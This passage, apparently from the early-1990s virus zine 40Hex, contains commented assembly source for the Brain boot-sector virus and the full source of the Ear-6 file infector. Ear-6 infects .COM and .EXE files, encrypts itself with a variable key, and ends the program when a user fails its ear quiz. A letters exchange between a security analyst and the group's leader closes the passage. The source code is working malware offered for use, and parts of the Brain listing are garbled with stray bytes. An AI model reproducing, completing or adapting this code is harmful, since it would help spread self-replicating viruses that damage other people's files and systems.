                mov     bx,offset readbuffer    ; buffer @ 6BEh
                push    es
                mov     ax,cs
                mov     es,ax
                mov     ax,201h
                int     6Dh                     ; Read boot sector
                pop     es
                jnc     continuestuff           ; continue if no error
                pop     cx
                loop    tryreadbootblock

                jmp     short resetdisk         ; too many failures
                pop     cx                      ; get system id in boot block
                mov     ax,word ptr cs:[offset readbuffer+4]
                cmp     ax,1234h                ; already infected?
                jne     dodisk                  ; if not, infect it
                mov     cs:int13flag,1          ; flag prev. infection
                jmp     short noreset
                push    ds
                push    es
                mov     ax,cs
                mov     ds,ax
                mov     es,ax
                push    si
                call    writevirus              ; infect the disk
                jc      failme                  ; exit on failure
                mov     cs:int13flag,2          ; flag success
                call    changeroot              ; manipulate volume label
                pop     si
                pop     es
                pop     ds
                jnc     noreset                 ; don't reset on success
                mov     ah,0                    ; reset disk
                int     6Dh                     ; int 13h
                pop     dx
                pop     cx
                pop     bx
                pop     ax
                cmp     cx,1
                jne     exitint13h
                cmp     dh,0
                jne     exitint13h
                cmp     cs:int13flag,1          ; already infected?
                jne     wasntinfected           ; if wasn't, go elsewhere
                mov     cx,word ptr cs:[offset readbuffer+7]
                mov     dx,word ptr cs:[offset readbuffer+5]
                mov     dl,cs:curdrive          ; otherwise, read real
                jmp     short exitint13h        ; boot sector
                cmp     cs:int13flag,2          ; successful infection?
                jne     exitint13h              ; if not, just do call
                mov     cx,cs:firstsector
                mov     dh,cs:firsthead
                int     6Dh                     ; int 13h
                retf    2
                db      15 dup (0)

FATManip:                                       ; returns al as error code
                jmp     short delvedeeper
FATManipreadcounter dw      3
                db      ' (c) 1986 Brain & Amjads (pvt) Ltd'
                call    readFAT                 ; Get FAT ID byte
                mov     ax,word ptr ds:[offset readbuffer]
                cmp     ax,0FFFDh               ; is it 360K disk?
                je      is360Kdisk              ; continue if so
                mov     al,3                    ; al=3 == not good disk
                stc                             ; flag error
                retn                            ; and exit
                mov     cx,37h
                mov     FATManipreadcounter,0   ; none found yet
                call    FATentry12bit           ; get entry in FAT
                cmp     ax,0                    ; unused?
                jne     notunused
                inc     FATManipreadcounter     ; one more found unused
                cmp     FATManipreadcounter,3   ; If need more,
                jne     tryanother              ;  go there
                jmp     short markembad         ; found 3 consecutive
                nop                             ; empty sectors
                mov     FATManipreadcounter,0   ; must start over
                inc     cx                      ; try next sector
                cmp     cx,163h                 ; end of disk?
                jne     checknextsector         ; if not, continue
                mov     al,1                    ; al=1 == none empty
                stc                             ; Indicate error
                mov     dl,3                    ; 3 times
                call    markbad12bit
                dec     cx
                dec     dl
                jnz     markanotherbad
                inc     cx
                call    calc1sttrack
                call    writeFAT                ; update FAT
                mov     al,0                    ; al=0 == ok
                clc                             ; indicate success

                push    cx
                push    dx
                mov     si,offset readbuffer    ; si -> buffer
                mov     al,cl
                shr     al,1
                jc      low_12                  ; low bits
                call    clus2offset12bit
                mov     ax,[bx+si]              ; get FAT entry
                and     ax,0F000h               ; mark it bad
                or      ax,0FF7h
                jmp     short putitback         ; and put it back
                call    clus2offset12bit
                mov     ax,[bx+si]              ; get FAT entry
                and     ax,0Fh                  ; mark it bad
                or      ax,0FF70h
                mov     [bx+si],ax              ; replace FAT entry
                mov     word ptr ds:[400h][bx+si],ax ; in two places
                pop     dx
                pop     cx

                push    cx
                mov     si,offset readbuffer    ; si->buffer
                mov     al,cl
                shr     al,1
; Part 3 of the virus starts here
                jc      want_high_12
                call    clus2offset12bit
                mov     ax,[bx+si]
                and     ax,0FFFh
                jmp     short exitFATentry12bit
                call    clus2offset12bit        ; xxxxxxxxxxxx0000
                mov     ax,[bx+si]              ; ^^^^^^^^^^^^wanted
                and     ax,0FFF0h               ; mask wanted bits
                mov     cl,4                    ; and move to correct
                shr     ax,cl                   ; position
                pop     cx

                push    dx
                mov     ax,3
                mul     cx
                shr     ax,1                    ; ax = cx*1.5
                mov     bx,ax
                pop     dx

                mov     ah,2                    ; read
                call    FAT_IO

                mov     ah,3                    ; write
                call    FAT_IO

                mov     cx,4                    ; try four times
                push    cx
                push    ax
                mov     ah,0                    ; reset disk
                int     6Dh                     ; int 13h
                pop     ax
                jc      tryFAT_IOagain
                mov     bx,offset readbuffer
                mov     al,4                    ; 4 sectors
                mov     dh,0                    ; head 0
                mov     dl,curdrive
                mov     cx,2                    ; sector 2
                push    ax                      ; (FAT)
                int     6Dh                     ; int 13h
                pop     ax
                jnc     exitFAT_IO
                pop     cx
                loop    FAT_IOLoop

                pop     ax
                pop     ax
                mov     al,2
                stc                             ; mark error
                pop     cx

                push    cx
                sub     cx,2
                shl     cx,1                    ; 2 sectors/cluster
                add     cx,0Ch                  ; start of data area
                mov     ax,cx                   ; ax = sector
                mov     cl,12h                  ; 4096
                div     cl                      ; ax/4096 = al rem ah
                mov     byte ptr firstsector+1,al
                mov     firsthead,0
                inc     ah
                cmp     ah,9                    ; past track 9?
                jbe     notpasttrack9           ; nope, we are ok
                sub     ah,9                    ; otherwise, adjust
                mov     firsthead,1
                mov     byte ptr firstsector,ah
                pop     cx

                db      0, 0, 0, 0, 0, 0
r_or_w_root     db      3
entrycount      dw      35h

tempsave1       dw      303h
tempsave2       dw      0EBEh
tempsave3       dw      1
tempsave4       dw      100h
                db      0E0h,0D8h, 9Dh,0D7h,0E0h, 9Fh
                db       8Dh, 98h, 9Fh, 8Eh,0E0h
                db      ' (c) ashar $'
                call    readroot                ; read in root directory
                jc      donotchangeroot
                push    di
                call    changevolume            ; change volume label
                pop     di
                jc      donotchangeroot
                call    writeroot               ; write back new root dir
; The following is just garbage bytes
                db      0BBh, 9Bh, 04h,0B9h, 0Bh
                db      0,8Ah,7,0F6h,0D8h,88h,4,46h,43h
                db      0E2h,0F6h,0B0h,8,88h,4,0F8h,0C3h
                db      0C6h, 06h

                mov     entrycount,6Ch
                mov     si,offset readbuffer+40h; 3nd dir entry
                mov     tempsave1,dx
                mov     ax,entrycount           ; 6Ch
                shr     ax,1
                mov     tempsave3,ax            ; 36h
                shr     ax,1
                mov     tempsave2,ax            ; 1Bh
                xchg    ax,cx
                and     cl,43h                  ; cx = 3
                mov     di,tempsave2
                add     di,1E3h                 ; di = 01FE
                mov     al,[si]
                cmp     al,0
                je      dolabel                 ; no mo entries
                mov     al,[si+0Bh]             ; attribute byte
                and     al,8                    ; volume label?
                cmp     al,8                    ; yes?
                je      dolabel                 ; then change it!
                add     si,20h                  ; go to next directory entry
                dec     entrycount
                jnz     findlabel               ; loop back
                stc                             ; Error!
                db      8Bh
                mov     bx,[di]                 ; offset a_data
                xor     bx,tempsave3            ; bx = 53Ah
                mov     tempsave3,si            ; si->direntry
                mov     ax,ss
                mov     tempsave1,ax
                mov     tempsave2,sp
                mov     ax,cs
                mov     ss,ax
                mov     sp,tempsave3
                add     sp,0Ch                  ;->reserved area
                mov     cl,51h
                add     dx,444Ch
                mov     di,2555h
                mov     cx,0C03h
                repe    cmpsw
                mov     ax,0B46h
                mov     cx,3
                rol     ax,cl                   ; ax = 5A30h
                mov     tempsave3,ax
                mov     cx,5
                mov     dx,8
                sub     tempsave3,5210h         ; 820h
                push    tempsave3               ; store attributes/reserved
; I haven't commented the remainder of this procedure.
; It basically changes the volume label to read "(c) Brain"

; Comment mode OFF

                mov     ah,[bx]                 ; 5a3h
                inc     bx
                mov     dl,ah
                shl     dl,1
                jc      dowhatever
                mov     dl,[bx]                 ; dl=C2h
                inc     bx                      ; bx=53Eh
                mov     al,dl
                shl     dl,1
                jc      searchstuff
                add     ax,1D1Dh
                push    ax
                inc     tempsave3
                db       73h, 01h               ; jnc $+3
                db      0EAh,0E2h,0E1h, 8Bh, 26h; jmp 268B:E1E2
                xchg    bp,ax
                add     al,0A1h
                xchg    bx,ax
                add     al,8Eh
                sar     bl,1
                add     dh,[bp+si]
                ;db       95h, 04h,0A1h, 93h, 04h, 8Eh
                ;db      0D0h,0FBh, 02h, 32h,0F8h,0C3h

; Comment mode ON

                mov     r_or_w_root,2           ; set action code
                jmp     short do_rw_root        ; easier to do w/
                nop                             ; mov ah, 2
                mov     r_or_w_root,3
                jmp     short do_rw_root        ; this is somewhat useless
                mov     dh,0                    ; head 0
                mov     dl,curdrive
                mov     cx,6                    ; sector 6
                mov     ah,r_or_w_root
                mov     al,4                    ; 4 sectors
                mov     bx,offset readbuffer
                call    doint13h
                jc      exit_rw_root            ; quit on error
                mov     cx,1
                mov     dh,1                    ; head 1
                mov     ah,r_or_w_root
                mov     al,3
                add     bx,800h
                call    doint13h


                mov     tempsave1,ax
                mov     tempsave2,bx
                mov     tempsave3,cx
                mov     tempsave4,dx
                mov     cx,4

                push    cx
                mov     ah,0                    ; Reset disk
                int     6Dh
                jc      errordoingint13h
                mov     ax,tempsave1
                mov     bx,tempsave2
                mov     cx,tempsave3
                mov     dx,tempsave4
                int     6Dh                     ; int 13h
                jnc     int13hsuccess
                pop     cx
                loop    doint13hloop

                stc                             ; indicate error
                pop     cx

                db      0, 0, 0
; Part 4 of the virus starts here
tempstorecx     dw      3
readwritecurrentdata    dw      301h

                call    FATManip
                jc      exitwritevirus
                mov     cursector,1
                mov     curhead,0
                mov     bx,offset readbuffer
                call    readcurrent
                mov     bx,offset readbuffer
                mov     ax,firstsector
                mov     cursector,ax
                mov     ah,firsthead
                mov     curhead,ah
                call    writecurrent
                call    calcnextsector
                mov     cx,5
                mov     bx,200h
                mov     tempstorecx,cx
                call    writecurrent
                call    calcnextsector
                add     bx,200h
                mov     cx,tempstorecx
                loop    writeanothersector

                mov     curhead,0
                mov     cursector,1
                mov     bx,0
                call    writecurrent
                clc                             ; indicate success

                mov     readwritecurrentdata,201h
                jmp     short doreadwrite
                mov     readwritecurrentdata,301h
                jmp     short doreadwrite       ; This is pointless.
                push    bx
                mov     cx,4

                push    cx
                mov     dh,curhead
                mov     dl,curdrive
                mov     cx,cursector
                mov     ax,readwritecurrentdata ; read or write?
                int     6Dh                     ; int 13h
                jnc     readwritesuccessful
                mov     ah,0                    ; reset disk
                int     6Dh                     ; int 13h
                pop     cx
                loop    tryreadwriteagain

                pop     bx
                pop     bx
                stc                             ; Indicate error
                pop     cx
                pop     bx

                inc     byte ptr cursector      ; next sector
                cmp     byte ptr cursector,0Ah
                jne     donecalculate           ; finished calculations
                mov     byte ptr cursector,1    ; clear sector #
                inc     curhead                 ; and go to next head
                cmp     curhead,2               ; if not too large,
                jne     donecalculate           ; we are done
                mov     curhead,0               ; otherwise clear head #
                inc     byte ptr cursector+1    ; and advance cylinder

                db       64h, 74h, 61h

; read buffer starts here
; insert your favorite boot block below...
brain           ends
40Hex Number 8 Volume 2 Issue 4                                       File 009

                  -=PHALCON/SKISM=- Ear-6 Virus

    The Ear-6 is a parasitic, non-resident, .COM & .EXE infector.  It
infects 5 files everytime it is run.  It will traverse towards the root
directory if fewer than 5 files are found.  We have no clue as to what
the 'AUX error' that Patti talks about.  But then again, Patti isn't
sure as to who she is, let alone an accurate discription on one of our
virii.  On activation (1st of any month), it plays ear quiz with
victim.  Failure to answer the question will result in program
                                        -) Gheap

; [Ear-6]

; El virus de oreja y oído seis
; Fue escrito por Dark Angel de PHALCON/SKISM
; Yo (el ángel oscuro) escribí este programa hace muchas semanas.
; No deba modificar este programa y da a otras personas COMO SI
; estará el suyo.

; ¿Dónde está mi llama, mama?

;                       diccionarito
; español       inglés                   magnitud      size
; abre          open                     mango         handle
; aprueba       pass (a test)            máscara       mask
; atras         back                     mensaje       message
; azado         random                   mes           month
; busca         find                     montón        heap
; cierra        close                    oreja, oído   ear
; cifra         code, encrypt, decrypt   pila          stack
; codo          pointer                  pregunta      question
; corto         terse, short             primer        first
; empieza       begin                    remendar      patch
; escriba       write                    renuncia      reject
; español       inglés                   respuesta     answer
; fecha         date                     salta         exit
; ficha         file                     siguiente     following, next
; índice        table                    suspende      fail (a test)
; ¿le gusta?    do you like?             termina       end
; longitud      length                   virus         virus (!)

.model tiny
org     100h

longitud_del_virus = TerminaVir - EmpezarVir
longitud_del_escribir = offset termina_escribir - offset escribir

id = 'GH'                                       ; Representa el líder de
                                                ; PHALCON/SKISM, Garbageheap
Empezar:  db      0e9h, 0, 0                    ; jmp EmpezarVir

        mov     bx, offset EmpezarCifra
        mov     cx, ((longitud_del_virus + 1) / 2)
hacia_atras:    ; atrás
        db      2eh
        db      81h, 37h, 0, 0                  ; xor word ptr cs:[bx], 0
        add     bx, 2
        loop    hacia_atras

        call    siguiente                       ; Es estupido, pero es corto
        pop     bp
        sub     bp, offset siguiente

        mov     byte ptr [bp+numinf], 0

        cld                                     ; No es necessario, pero
                                                ; ¿por qué no?
        cmp     sp, id
        jz      SoyEXE
SoyCOM: mov     di, 100h
        push    di
        lea     si, [bp+Primer3]
        jmp     short SoyNada
SoyEXE: push    ds
        push    es
        push    cs
        push    cs
        pop     ds
        pop     es

        lea     di, [bp+EXE_Donde_JMP]  ; el CS:IP original de la ficha
        lea     si, [bp+EXE_Donde_JMP2] ; infectada

        jmp     short SoyNada

NombreDelVirus  db  0,'[Ear-6]',0               ; En inglés, ¡por supuesto!
NombreDelAutor  db  'Dark Angel',0


        mov     ah, 1ah                         ; Esindicece un DTA nuevo
        lea     dx, [bp+offset nuevoDTA]        ; porque no quiere destruir
        int     21h                             ; el DTA original

        mov     ax, word ptr [bp+remendar1+1]
        mov     word ptr [bp+tempo], ax

        mov     ah, 47h                         ; Obtiene el directorio
        xor     dl, dl                          ; presente
        lea     si, [bp+diroriginal]
        int     21h

        lea     dx, [bp+offset mascara1]        ; "máscara", no "mascara"
        call    infectar_mascara                ; pero no es possible usar
                                                ; acentos en MASM/TASM.
                                                ; ¡Qué lástima!
                                                ; mascara1 es '*.EXE',0
        lea     dx, [bp+offset mascara2]        ; mascara2 es '*.COM',0
        call    infectar_mascara                ; infecta las fichas de COM

        cmp     byte ptr [bp+numinf], 5         ; ¿Ha infectada cinco fichas?
        jg      saltar                          ; Si es verdad, no necesita
                                                ; busca más fichas.
        mov     ah, 3bh                         ; Cambia el directorio al
        lea     dx, [bp+puntos]                 ; directorio anterior
        int     21h                             ; ('..', 'punto punto')
        jnc     looper

saltar: lea     dx, [bp+backslash]              ; Cambia el directorio al
        mov     ah, 3bh                         ; directorio terminado.
        int     21h

        mov     ah, 2ah                         ; Activa el primer de
        int     21h                             ; cada mes
        cmp     dl, 1                           ; Si no es el primer,
        jnz     saltarahora                     ; ¡saltar ahora! (duh-o)

        mov     ah, 2ch                         ; ¿Qué hora es?
        int     21h

        cmp     dl, 85                          ; 85% probabilidad de
        jg      saltarahora                     ; activación

        and     dx, 7                           ; Un número quasi-azado
        shl     dl, 1                           ; Usalo para determinar
        mov     bx, bp                          ; que preguntará la virus
        add     bx, dx
        mov     dx, word ptr [bx+indice]        ; índice para el examencito
        add     dx, bp
        inc     dx
        push    dx                              ; Salva el codo al pregunta

        mov     ah, 9                           ; Escriba el primer parte de
        lea     dx, [bp+mensaje]                ; la pregunta
        int     21h

        pop     dx                              ; Escriba el parte de la oreja
        int     21h                             ; o el oído
        dec     dx
        push    dx                              ; Salva la respuesta correcta

        lea     dx, [bp+secciones]              ; Escriba los secciones de la
        int     21h                             ; oreja y el oído

        mov     ah, 7                           ; Obtiene la respuesta de la
        int     21h                             ; "víctima"
        cmp     al, '1'                         ; Necesita una respuesta de
        jl      trataotrarespuesta              ; uno hasta tres
        cmp     al, '3'                         ; Renuncia otras respuestas
        jg      trataotrarespuesta

        int     29h                             ; Escriba la respuesta

        pop     bx                              ; El codo al respuesta
                                                ; correcta
        mov     ah, 9                           ; Prepara a escribir un
                                                ; mensaje
        cmp     al, byte ptr [bx]               ; ¿Es correcta?
        jz      saltarapidamente                ; Él aprueba el examencito.
                                                ; Pues, salta rápidamente.
        lea     dx, [bp+suspendido]             ; Lo siento, pero ¡Ud. no
        int     21h                             ; aprueba el examencito fácil!

        mov     ah, 4ch                         ; Estudie más y el programa
        jmp     quite                           ; permitirá a Ud a continuar.

        lea     dx, [bp+aprueba]
        int     21h
        mov     ah, 1ah                         ; Restaura el DTA original
        mov     dx, 80h
        cmp     sp, id - 4                      ; ¿Es EXE o COM?
        jz      vuelvaEXE
        int     21h                             ; Restaura el DTA y vuelva
        retn                                    ; a la ficha original de COM

        pop     es
        pop     ds                              ; ds -> PSP

        int     21h

        mov     ax, es
        add     ax, 10h                         ; Ajusta para el PSP
        add     word ptr cs:[bp+EXE_Donde_JMP+2], ax
        add     ax, word ptr cs:[bp+PilaOriginal+2]
        mov     ss, ax
        mov     sp, word ptr cs:[bp+PilaOriginal]
        db      0eah                            ; JMP FAR PTR SEG:OFF
EXE_Donde_JMP dd 0
PilaOriginal  dd 0

EXE_Donde_JMP2  dd 0
PilaOriginal2   dd 0

        mov     ah, 4eh                         ; Busca la ficha primera
        mov     cx, 7                           ; Cada atributo
        int     21h
        jc      hasta_la_vista_bebe             ; No la busca

        xor     al, al
        call    abrir                           ; Abre la ficha

        mov     ah, 3fh
        mov     cx, 1ah
        lea     dx, [bp+buffer]
        int     21h

        mov     ah, 3eh                         ; Cierra la ficha
        int     21h

        lea     si,[bp+nuevoDTA+15h]            ; Salva cosas sobre la ficha
        lea     di,[bp+f_atrib]                 ; Por ejemplo, la fecha de
        mov     cx, 9                           ; creación
        rep     movsb

        cmp     word ptr [bp+buffer], 'ZM'      ; ¿Es EXE o COM?
        jz      buscaEXE
        mov     ax, word ptr [bp+f_long]        ; ¿Cuan grande es la ficha?
        sub     ax, longitud_del_virus + 3      ; Adjusta para el JMP
        cmp     ax, word ptr [bp+buffer+1]      ; ¿Ya es infectada?
        jnz     infecta_mi_burro                ; "infect my ass"
        jmp     short BuscaMas
        cmp     word ptr [bp+buffer+10h], id
        jnz     infecta_mi_burro
        mov     ah, 4fh                         ; Busca otra ficha...
        jmp     short brb_brb
hasta_la_vista_bebe:                            ; ¿Le gusta Arnold?

        ; AX = longitud de la ficha infectada
        lea     si, [bp+buffer]

        cmp     word ptr [si], 'ZM'
        jz      InfectaEXE
        push    ax

        mov     cx, word ptr [bp+tempo]
        mov     word ptr [bp+remendar1+1], cx

        lea     di, [bp+Primer3]
        push    si

        mov     byte ptr [bp+buffer], 0e9h
        pop     di
        add     ax, longitud_del_virus

        mov     cx, 3
        jmp     short   TerminaInfeccion
        les     ax, [si+14h]                    ; Salva el original empieza
        mov     word ptr [bp+EXE_Donde_JMP2], ax; CS:IP de la ficha infectada
        mov     word ptr [bp+EXE_Donde_JMP2+2], es

        les     ax, [si+0Eh]                    ; Salva la original locación
        mov     word ptr [bp+PilaOriginal2], es ; de la pila
        mov     word ptr [bp+PilaOriginal2+2], ax

        mov     ax, word ptr [si + 8]
        mov     cl, 4
        shl     ax, cl
        xchg    ax, bx

        les     ax, [bp+offset nuevoDTA+26]
        mov     dx, es
        push    ax
        push    dx

        sub     ax, bx
        sbb     dx, 0

        mov     cx, 10h
        div     cx

        mov     word ptr [si+14h], dx           ; Nuevo empieza CS:IP
        mov     word ptr [si+16h], ax

        mov     cl, 4
        shr     dx, cl
        add     ax, dx
        mov     word ptr [si+0Eh], ax           ; y SS:SP
        mov     word ptr [si+10h], id

        pop     dx                              ; Restaura el magnitud de
        pop     ax                              ; la ficha

        add     ax, longitud_del_virus          ; Añada el magnitud del virus
        adc     dx, 0
        mov     cl, 9
        push    ax
        shr     ax, cl
        ror     dx, cl
        adc     dx, ax
        pop     ax
        and     ah, 1

        mov     word ptr [si+4], dx             ; Nuevo magnitud de la ficha
        mov     word ptr [si+2], ax

        push    cs
        pop     es

        mov     ax, word ptr [si+14h]
        sub     ax, longitud_del_virus + offset Empezarvir
        push    ax

        mov     cx, 1ah
        mov     al, 2
        call    abrir

        mov     ah, 40h
        lea     dx, [bp+buffer]
        int     21h

        mov     ax, 4202h
        xor     cx, cx
        cwd                                     ; xor dx,dx
        int     21h

        mov     ah, 2ch                         ; Números azados en CX y DX
        int     21h
        mov     word ptr [bp+remendar3+2], cx   ; Es el nuevo número de la
                                                ; cifra
        and     cx, 31                          ; Pone un número azado para el
        add     cx, ((longitud_del_virus + 1) / 2); magnitud de la ficha.  Por
                                                ; eso, los scanners necesitan
        mov     word ptr [bp+remendar2+1], cx   ; usar "wildcards"
        lea     di, [bp+tempstore]
        mov     al, 53h                         ; push bx
        stosb                                   ; (no destruir el mango de la
                                                ;  ficha)
        lea     si, [bp+shwing]                 ; Copia las instrucciones
        push    si                              ; para formar la cifra
        mov     cx, longitud_de_la_cifra
        push    cx
        rep     movsb

        mov     al, 5bh                         ; pop bx
        stosb                                   ; (recuerda mango de la ficha)

        lea     si, [bp+escribir]               ; Copia las instrucciones
        mov     cx, longitud_del_escribir       ; para añada el virus a la
        rep     movsb                           ; ficha

        mov     al, 53h                         ; push bx

        pop     cx                              ; Copia las instrucciones
        pop     si                              ; para invalidar la cifra
        rep     movsb
        mov     ax, 0c35bh                      ; pop bx, retn

        pop     ax

        ; Codo del comienzo de la cifra
        add     ax, offset EmpezarCifra + longitud_del_virus
        mov     word ptr [bp+remendar1+1], ax

        call    antes_del_tempstore

        mov     ax, 5701h                       ; BX = mango de la ficha
        mov     dx, word ptr [bp+f_fecha]
        mov     cx, word ptr [bp+f_hora]
        int     21h                             ; Restaura fecha y hora

        mov     ah, 3eh
        int     21h

        xor     ch, ch
        mov     cl, byte ptr [bp+f_atrib]
        mov     ax, 4301h
        lea     dx, [bp+offset nuevoDTA + 30]     ; Busca un ficha en el DTA
        int     21h

        inc     byte ptr [bp+numinf]

        jmp     BuscaMas

Primer3  db 0CDh, 20h, 0
puntos   db '..',0
mascara1 db '*.EXE',0
mascara2 db '*.COM',0

abrir:  mov     ah, 3dh                         ; Abrir un ficha
        lea     dx, [bp+nuevoDTA+30]            ; Nombre de la ficha es en
        int     21h                             ; el DTA
        xchg    ax, bx

indice  dw      offset oreja1, offset oreja2, offset oreja3, offset oreja4
        dw      offset oreja5, offset oreja6, offset oreja4, offset oreja1
oreja1  db      '1','Auditory Canal$'
oreja2  db      '1','Lobe$'
oreja3  db      '2','Anvil$'
oreja4  db      '2','Eustachian Tube$'
oreja5  db      '3','Auditory Nerve$'
oreja6  db      '3','Cochlea$'

mensaje db      'PHALCON/SKISM 1992 [Ear-6] Alert!',13,10,'Where is the $'
secciones db    ' located?',13,10
        db      ' 1. External Ear',13,10
        db      ' 2. Middle Ear',13,10
        db      ' 3. Inner Ear',13,10,'( )',8,8,'$'

; No es bueno.
suspendido db   13,10,'You obviously know nothing about ears.'
        db      13,10,'Try again after some study.',13,10,'$'

; ¡Espero que sí!
aprueba db      13,10,'Wow, you know your ears!  Please resume work.',13,10
        db      '$'

        mov     ah, 40h
        mov     cx, TerminaVir - EmpezarVir
        lea     dx, [bp+EmpezarVir]
        int     21h

backslash db '\'

TerminaVir = $

; Los que sigue son en el montón...
longitud_de_la_cifra = offset EmpezarCifra - offset shwing

diroriginal db 64 dup (?)
tempo       dw ?
nuevoDTA    db 43 dup (?)
numinf      db ?
; tempstore es el buffer para el parte del programa que añada el virus al fin
; de otro programa
tempstore   db (longitud_de_la_cifra*2+longitud_del_escribir+5) dup (?)
                                                ; añada cinco para los pop,
                                                ; los push, y el retn
buffer      db 1ah dup (?)
f_atrib     db      ?                           ; atributo de la ficha
f_hora      dw      ?                           ; hora de creación
f_fecha     dw      ?                           ; fecha de creación
f_long      dd      ?                           ; magnitud de la ficha

        end     Empezar

40Hex Number 8 Volume 2 Issue 4                                       File 010

    Letters to the editor!  Well, as you can imagine when I got this
message I was quite startled.  Sorry Paul, no top billing this time :-).
Although it is at this point, that I would like to say a couple things.
For instance, the virus community seems to think that their actions go
unnoticed.  As you might imagine, this is not quite true.  C'mon,
security people get their hands on 40Hex shortly after our boards get
it.  Just letting you know that big brother is watching :).

40-Hex Response:

   As a Security Analyst I find 40-Hex an incredibly interesting magazine.
The magazine presents entirely different viewpoints then what is in the
industry magazines such as Virus Bulletin, Virus News International and 
Virus News and Reviews.   Although all three of these publications are good
and very useful to me in my job, 40-Hex does indeed keep my mind open.  It
discusses viruses in depth, including commented source code, and has been a
real learning tool for me.  There is just not anywhere that you can get the
detailed analysis of a virus except in a magazine like 40-Hex.  I can't help
but be torn between my thirst for knowledge about virii and how they work,
and the fear that the more knowledge about virus writing becomes available to
the public, the greater chance that there is going to be more and more garbage
out there and more and more irresponsible people releasing this garbage on
their "friends and neighbors".

   I do want to thank 40-Hex for what I consider a very favorable review.  I
had to laugh about the comments, because frankly I agreed with them.  I guess
that I do get a little melodramatic sometimes.  But I do honestly believe 
that the knowledge exists out there to create a program/virus that will
be able to escape detection by any method in use today.  Whether it will 
ever be written and whether it will have destructive capabilities I don't 
really know. I don't know of any virus writers that make profits off 
their work.  While all the anti-virus developers, although they complain
about the work that they have to do to keep up with the virus writers, 
certainly make a nice profit on something like a Michelangelo scare.  So 
the only motivation for the virus writer is the challenge of creating a 
nearly undetectable virus.  

   I am very curious myself to see if the NCSA's prediction of 40,000 virii  
by 1994 comes true.  I certainly agree with 40-Hex that most of 
these virii will be hacks of some of the existing code out there now. The 
anti-virus industry itself can't decide on how to count different strains of 
viruses, so anyone will be able to make whatever claim they want anyway.

   Finally, Dr. Solomon said it best informally at the First International 
Virus Prevention Conference.  He was talking about how America was founded
on freedom and the rights of the individual.  He said that Americans seem
far too willing, in his opinion, to voluntarily give up those rights.  Right
now, virus writing is not illegal.  And hopefully it never will be, because
what you or I do with our own personal computers is no one else's business 
but our own.  But when we interfer with someone else's computer or data or
life, that I believe that is where the line is drawn.   Its going to be a 
very long and hard process to determine responsibility for damages caused by
a virus.  Passing a law to make virus writing itself illegal will not solve 
the problem.  Something, though, has to be done to protect an individual's
or a corporation's rights to have a virus-free working environment.  There
are enough problems with buggy commercial software, without having to worry
about virii hitting your computers too.  But until that time comes part of
my job will continue to be warning people about the dangers of viruses and
helping them protect their data.

                                                    Paul Melka

Response to a Response to a Response:

    As the head of the -=PHALCON/SKISM=-, I find your letter a very
interesting response.  I thank you for your raving reviews on 40Hex.  We
try to make it a magazine that everyone can learn from.  Well, I still
debate the undetectable virus issue.  Regarding the virus writer/anti-virus
issue, I definately agree, that the anti-virus people are motivated by greed
more then anything else.   I am glad to see that you agreed with my oh so
witty comments, they weren't meant to be abusive, just a little comic relief.
    I agree with you on the issues regarding a virus-free working
environment.  But, as you already know,  writing a virus isn't
illegal, it is the spreading that is illegal.  Unfortunately, it is too
late to start working on anti-virus writing legislation now.  The damage
has been done.  The virus issue is fairly similiar to the AIDS issue.
You have to use protection, no matter what.  There will never be an end
to virii.  Even if everyone stopped writing virii, the infection rate
wouldn't decrease.  I  don't know of many people that get hit by the
newer strains that have been coming out.  Most people still get hit by
Jerusalem, Stoned, and other 'classics'.
    I would be very interested in what solutions you may have come up with
to protect the rights of individuals and corporations.  I hadn't heard about
Dr. Solomon's comments, until I recieved your letter.  Quite frankly, I agree
with what he is saying.  Another major problem with making virus writing
illegal is the definition of a virus, or trojan for that matter.  It is
very difficult to come up with a concrete definition.
    I appreciate your response, and definately encourage other people, either
pro- or anti- virus to respond!

I don't want anybody complaining about not being able to compile the PS-MPC
utility in 40Hex-8, so listen close.  You must set the "unsigned chars" option 
on in order for the utility to compile properly.  It is in the Options/Compile 
menu.  Spread the word along with 40Hex...